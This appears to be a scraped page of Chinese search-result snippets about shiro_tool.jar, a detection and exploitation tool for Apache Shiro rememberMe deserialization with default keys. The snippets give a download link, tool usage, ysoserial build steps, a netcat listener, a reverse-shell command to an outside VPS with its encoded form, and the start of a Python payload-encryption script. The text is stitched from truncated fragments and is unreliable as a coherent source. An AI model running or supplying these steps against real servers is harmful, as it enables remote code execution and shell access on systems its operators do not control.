download_url:https://toolaffix.oss-cn-beijing.aliyuncs.com/wyzxxz/20221128/shiro_tool.jar 优化一些功能: 1、spring/tomcat回显,执行命令的时候,x=whoami 就行 2、批量检测是否shiro 3、目标服务器不出网的情况下探测 4、key 目前 401 个。 5、默认会加载当前目录下的 keys.txt 文件,可以把key放到keys....
shiro 反序列 命令执行辅助检测工具. Contribute to wyzxxz/shiro_rce_tool development by creating an account on GitHub.
tl**倾城上传44.68MB文件格式zip 一款好用的shiro检测利用工具,使用方式java -jar shiro_tool.jar https://xx.xx.xx.xx,Github有开源下载链接,在这里上传是为了赚积分下载别的工具,欢迎使用 (0)踩踩(0) 所需:1积分 资源专区-课程设计-编程作业-基于Java的模拟写字板的设计与实现 ...
3,下载ysoserial 生成Remember Me的工具 git clonehttps://github.com/frohoff/ysoserial.git 使用mvn打包编译 cd ysoserial mvn package -D skipTests(打包完的ysoserial-0.0.6-SNAPSHOT-all.jar在ysoserial/target文件中) 漏洞复现: 1,使用shiro_tool.jar工具检测漏洞是否存在(检测存在默认key) 2,在VPS上开启nc监...
1、java -jar .\shiro_tool.jar url 检测结果 2、服务器监听一个端口50058,这个是拿来反弹shell的 nc -lvnp 50058 反弹shell 命令:bash -i >& /dev/tcp/39.99.xx.xx/50058 0>&1 利用网站http://www.jackson-t.ca/runtime-exec-payloads.html对命令进行编码:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3...
https://github.com/wyzxxz/shiro_rce_tool https://toolaffix.oss-cn-beijing.aliyuncs.com/wyzxxz/20221128/shiro_tool.jar 原创稿件征集 征集原创技术文章中,欢迎投递 投稿邮箱:edu@antvsion.com 文章类型:黑客极客技术、信息安全热点安全研究分析等安全相关 ...
git clonehttps://github.com/frohoff/ysoserial.git cd ysoserial mvn package -D skipTests PS:终于打包完了,没想到Maven源换成了阿里云的速度还是有点慢。 3.3 漏洞检测 这里使用shiro_tool.jar工具检测Shiro是否存在默认的key, java -jar shiro_tool.jarhttp://192.168.31.81:8080/ ...
git clone https://github.com/frohoff/ysoserial.git cd ysoserial mvnpackage-DskipTests PS:终于打包完了,没想到Maven源换成了阿里云的速度还是有点慢。 3.3 漏洞检测 这里使用shiro_tool.jar工具检测Shiro是否存在默认的key, 代码语言:javascript 复制
和 l1nk3r 师傅交流了一下,他提到一种检测 Shiro Key 的方法很不错,据说原理来自 shiro_tool.jar ,详情可以参考这篇文章一种另类的 shiro 检测方式,我这里简单复述一下结论。 使用一个空的 SimplePrincipalCollection 作为 payload,序列化后使用待检测的秘钥进行加密并发送,秘钥正确和错误的响应表现是不一样的,...
使用shiro_tool.jar复现: 也可以使用python脚本 1234567891011121314151617181920212223242526 importsysimportbase64importuuidfromrandomimportRandomimportsubprocessfromCrypto.CipherimportAESdefencode_rememberme(payload,command):popen=subprocess.Popen(['java','-jar','../ysoserial/ysoserial-0.0.6-SNAPSHOT-all.jar',payl...